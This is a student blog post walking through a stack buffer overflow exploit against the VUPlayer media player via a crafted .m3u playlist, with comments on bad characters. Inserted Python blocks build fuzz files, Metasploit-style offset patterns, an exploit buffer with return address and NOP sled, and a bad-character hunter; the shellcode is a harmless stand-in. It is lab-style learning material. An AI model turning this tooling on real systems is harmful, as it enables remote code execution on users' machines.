Tuesday, February 14, 2012

VuPlayer Buffer Overflow - Non SEH

In this article I try to exploit a buffer overflow in VUPlayer; in this case the application falls into the non-SEH category. Before starting the exploitation I first gathered information about the target application.
I opened the application, clicked "Help" and then "About VUPlayer", and got the link to the official website of the target application, so I went to the website to collect some information.
I found some information about the supported file formats and the encoding capabilities of the application; after that I wanted to test how the application runs.
The application runs and plays an MP3 file. After testing with a normal file, I tried a fuzzer that writes anomalous content, to see how the application responds.
The script that creates an MP3 file with anomalous content, and the result when I load that file into the application, are shown in the screenshots.
Nothing changed; I did not see any crash of the application, so I decided not to go through loading an MP3 file but through opening a playlist. When I collected information about the application I found that it loads .vpl as its default playlist format, which I expected it would load directly. Here is the script:
And I tried to load the file created with this Python script.
Nothing loaded and nothing played. I supposed this fuzzer did not work against this application, but I wanted to look at it in a debugger. In this case I used Immunity Debugger rather than OllyDbg; this is the result when I open the application with Immunity Debugger:
I found an alert message about the entry point of the modules BASS, BASSWMA and BASSMIDI when I opened the application, and this is the memory contents when VUPlayer is opened in Immunity Debugger:
I opened the application once again to look at it in more detail.
I checked which file types the application can open and read as a playlist; I found vpl, m3u, pls, asx, wax and cue.
I chose the second one, the m3u extension, for the next fuzzer; here is the modified script for fuzzing the application:
And I opened the application from Immunity Debugger to identify the changes in memory when this file is loaded.
When I loaded the fake playlist with the m3u extension, the application crashed, as seen in the picture: ESP and ESI were flooded with the "A" character and EIP was overwritten with 41 (the "A" character). The screen at the left went blank, but the important thing is that the fuzzer worked and crashed the application. The next stage is to create a character pattern with the Metasploit tools and load it in the script, which looks like this:
I loaded this script's output into the application again and looked at what happened afterwards.
This is the resulting effect in memory when the file is loaded in the application. Now the value in EIP is known, and the number of characters up to ESP can be counted with the Metasploit pattern_offset tool, like this:
After finding the number of bytes from the start of the data to EIP (and the position of ESP), I applied this data to the last version of the fuzzer, like this:
And I ran it against the application once more to prove that the EIP offset is correct; this is the result:
EIP was overwritten with "A" characters (41414141), which means the EIP offset is correct at 1012 bytes of data. Having found the ESP and EIP positions, I then modified the fuzzer to include an ESP address (a return address from a loaded module that lands on ESP). To find it I switched to the "Executable modules" view, and the address found there goes into the next modification of the fuzzer.
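The steps above (flood the playlist with "A", replace the flood with a cyclic pattern, look up the bytes that landed in EIP) can be scripted without Metasploit. The block below is an added example, not the post's own script: it builds the fuzz file, re-implements the `Aa0Aa1Aa2...` sequence that `pattern_create.rb` emits, and looks up an EIP value the way `pattern_offset.rb` does. The file names are assumptions; the EIP value in the demo, 0x68423768, is simply what this pattern produces at offset 1012, the offset the post reports.

```python
"""Added example (not the post's script): m3u fuzz file generator plus a
re-implementation of Metasploit's pattern_create / pattern_offset logic."""
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def fuzz_m3u(length, fill=b"A"):
    """Playlist body: one 'track path' made of `length` filler bytes.
    The player reads the line as a path, so an overlong line is what overflows."""
    return fill * length


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2... (same sequence as pattern_create.rb).
    Every 4-byte window is unique, so the value that lands in EIP
    identifies its own offset in the buffer."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than %d bytes not supported" % len(out))


def pattern_offset(eip, length):
    """Offset of the 4 bytes now in EIP, or -1 if they are not from the
    pattern. `eip` is the value as the debugger displays it (e.g. 0x68423768);
    x86 is little-endian, so the bytes in memory are the reverse of the hex."""
    needle = struct.pack("<I", eip)
    pat = pattern_create(length)
    idx = pat.find(needle)
    if idx < 0:
        # Misaligned overwrites sometimes show up byte-swapped; try that too.
        idx = pat.find(needle[::-1])
    return idx


def write_playlist(path, data):
    """Write the raw bytes; no newline, so nothing truncates the line."""
    with open(path, "wb") as f:
        f.write(data)


if __name__ == "__main__":
    # Step 1: crash with 'A's.  Step 2: replace with the cyclic pattern.
    write_playlist("fuzz.m3u", fuzz_m3u(2000))          # assumed file name
    write_playlist("pattern.m3u", pattern_create(2000))  # assumed file name
    # Step 3: after the crash, read EIP in Immunity Debugger and look it up.
    print(pattern_offset(0x68423768, 2000))  # 1012 for this pattern
```

Run it, open `pattern.m3u` in the player under the debugger, read EIP from the registers pane and pass it to `pattern_offset`; the returned index is the number of bytes to put before the return address.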
With the ESP address added, the fuzzer looks like this:
From here I tested loading a payload generated on the Metasploit website; this puts the payload into the exploit so that it runs on the target system. Here is the payload I used:
Now I tested this exploit by loading it in the application on the target system; this is the state after the exploit is loaded:
I tried to make a connection to the target system.
I found that this failed; maybe the connection failed because there was no channel to connect over. I had the idea to look at it with Wireshark, and this is the Wireshark capture:
I saw TCP activity and tried modifying the last script with some adjustments. I was just experimenting with this; I was still confused about how to read Wireshark and get accurate information from it. This is the modification of my script:
And I tried this experimental script:
In this state EIP changed to 90909090, which I felt was strange and probably meant it had failed, but I still wanted to test the connection.
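A value of 90909090 in EIP means the four bytes at the return-address slot were NOPs, which happens when the padding before the return address is longer than the measured offset. The block below is an added example, not the post's script: it lays the exploit buffer out (padding, return address packed little-endian, NOP sled, shellcode) and models which four bytes the CPU pops into EIP. `OFFSET` is the 1012 the post found; `JMP_ESP` is a placeholder for the address taken from the executable module in Immunity Debugger, and the shellcode is a constructed stand-in of INT3 bytes.

```python
"""Added example (not the post's script): exploit buffer layout and a model
of the crash that explains a 90909090 in EIP."""
import struct

OFFSET = 1012         # bytes before the saved return address (from the post)
JMP_ESP = 0x10101010  # ASSUMPTION: placeholder; use the JMP ESP found in the module


def build_exploit(shellcode, offset=OFFSET, ret=JMP_ESP, nops=16, pad=b"A"):
    """pad*offset | ret (little-endian) | NOP sled | shellcode.
    When the overwritten return address is popped, ESP points just past it,
    i.e. at the NOP sled; a JMP ESP at `ret` therefore slides into the shellcode."""
    buf = pad * offset
    buf += struct.pack("<I", ret)   # x86 is little-endian: 0x10101010 -> 10 10 10 10
    buf += b"\x90" * nops
    buf += shellcode
    return buf


def eip_from_buffer(buf, offset=OFFSET):
    """Model the crash: EIP receives the 4 bytes at the real offset,
    whatever the script put there."""
    return struct.unpack("<I", buf[offset:offset + 4])[0]


def bytes_at_esp(buf, offset=OFFSET):
    """What ESP points at after the return: everything past the return address."""
    return buf[offset + 4:]


if __name__ == "__main__":
    shellcode = b"\xcc" * 8  # constructed stand-in (INT3), not a real payload
    good = build_exploit(shellcode)
    print(hex(eip_from_buffer(good)))                 # the JMP ESP address
    # Padding of 1016 NOPs instead of 1012: the return slot is filled with
    # 0x90 bytes and the debugger shows EIP = 90909090.
    wrong = build_exploit(shellcode, offset=1016, pad=b"\x90")
    print(hex(eip_from_buffer(wrong)))                # 0x90909090
```

Checking `eip_from_buffer` against the value the debugger shows is a quick way to tell a layout mistake from a payload problem: if the modelled EIP is the return address but the debugger shows something else, the offset or the byte order is wrong; if they agree and the shell still does not come back, look at the payload and bad characters.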
As I guessed, this failed. But I found it strange that when I open the application from Immunity Debugger, VUPlayer gives a pop-up alert message; maybe that is the way to exploit this application. Here is the alert message the application shows every time it is opened in Immunity Debugger:
This alert is labelled "Entry Point" and lists three modules: BASS, BASSWMA and BASSMIDI. I think these are alternative entry points, since my first theory, manipulating the playlist file, had failed. Now I will try to find out more about this message.


I loaded the application from Immunity Debugger again and searched for the BASS module; I found it here:
I found this and selected BASS.dll in the executable modules as the target for the exploit.
From here I wanted to try the attack using this ESP address from the BASS module, with this script:
And I ran it in the application while monitoring with Immunity Debugger.
Now I continue with the same steps as before.
From this offset data I modified my fuzzer script to look like this:
And I tried to confirm that EIP can be overwritten with this data, like this:
Here the script succeeded in overwriting EIP, and now I wanted to load the last payload with the ESP address from BASS.dll.
The result was the same as in the last experiment, and the connection still failed.
Here I ran the attack with the BASSWMA.dll module:
And modified the script with the ESP address from the BASSWMA module:
The same here, it failed, but at this point I suspected that the failure was in the payload. I tried changing the payload type in the script; now I used Reverse DLL Inject.


Here it failed again. Now I think the problem is in the payload; maybe it contains bad characters. Maybe I should try generating the payload in Metasploit.


Here, once again, I failed to make the connection. Up to the point where EIP is overwritten by the fuzzer content everything looks successful, but after that step I always failed at the payload generation stage.


After countless attempts at generating a payload, here is the script that worked:
Nothing in the script changed significantly; I just removed unused variables, loaded the payload and ran it against the application.
The application crashed and froze as in that picture, and the memory state is shown here:
And I tried to make a connection from the BackTrack terminal with telnet; the result is shown here:
Now I have succeeded in exploiting this application, and I think this payload will also work with the other holes, in BASS.dll, BASSWMA and BASSMIDI, because I succeeded in taking over EIP there too and the problem was only in the payload.


Next I will learn more about finding bad characters, because I lost so much time finding a payload that matched and worked without bad characters.
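The usual way to find bad characters, as an added example that is not part of the post: put a string of all 256 byte values right after the return address so it lands where ESP points, compare what the debugger's dump window shows with what was sent, exclude the first byte that was changed or cut off, and repeat until the whole string arrives intact. The `fake_playlist_reader` below is a constructed stand-in for the target that treats the data as one text line; VUPlayer's real behaviour has to be read from the debugger, and in a real run `reader` is replaced by pasting the bytes copied from Immunity Debugger.

```python
"""Added example (not from the post): iterative bad-character hunt."""


def badchar_string(exclude=()):
    """All 256 byte values minus the ones already known to be bad.
    In the exploit this string goes right after the return address."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, landed):
    """Index of the first byte that was changed or cut off, or -1 if every
    byte arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(landed) or landed[i] != b:
            return i
    return -1


def hunt_badchars(reader, max_rounds=256):
    """Send the test string, compare with what landed, exclude the first
    mangled byte, repeat. One byte per round, because everything after the
    first bad byte is unreliable (truncated or shifted)."""
    bad = []
    for _ in range(max_rounds):
        sent = badchar_string(exclude=bad)
        landed = reader(sent)
        i = first_mismatch(sent, landed)
        if i < 0:
            return bad
        bad.append(sent[i])
    raise RuntimeError("no clean run after %d rounds" % max_rounds)


def fake_playlist_reader(data):
    """Constructed stand-in for the target (an ASSUMPTION, not VUPlayer's
    parser): the data is one text line, so it stops at NUL, LF or CR."""
    for terminator in b"\x00\x0a\x0d":
        cut = data.find(bytes([terminator]))
        if cut >= 0:
            data = data[:cut]
    return data


if __name__ == "__main__":
    # Each round reports the next bad byte; the stand-in yields NUL, LF, CR.
    print([hex(b) for b in hunt_badchars(fake_playlist_reader)])
```

The list that comes out is what the payload encoder must avoid (`msfvenom -b`, or the "bad characters" field on the Metasploit payload generator the post used). With mona.py loaded in Immunity Debugger, `!mona bytearray` and `!mona compare` automate the same send-and-compare loop.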

5 comments:

  1. ew, we have the same problem.. :P
    my payload won't start either..

    ReplyDelete
    Replies
    1. I suppose this problem is caused by bad characters included in the payload, and I don't know how to detect and count bad characters for this application...

      Delete
    2. Maybe you typed the wrong address for EIP in the last fuzzer.
      I see you typed "\x90" * 1016 there..
      and when I look at your pattern_offset result it says 1012.
      try changing it.. :P

      Delete
    3. Yep, I found that mistake and have revised it, but I still have the same problem; maybe it is bad characters included in the payload, so I think the problem is bad characters. After countless trials generating payloads I've succeeded in exploiting it. Anyway, thanks for your advice; next time please correct me if I make a mistake...

      Ganbatte yo!!

      Delete
    4. Hoho..
      Early on, I had a problem with bad characters too..
      still don't know how to find them.. :P

      sure,
      we're in the same dojo..
      let's fight together.. :D

      Delete

 
IS2C © 2012 Blog's Student | is2c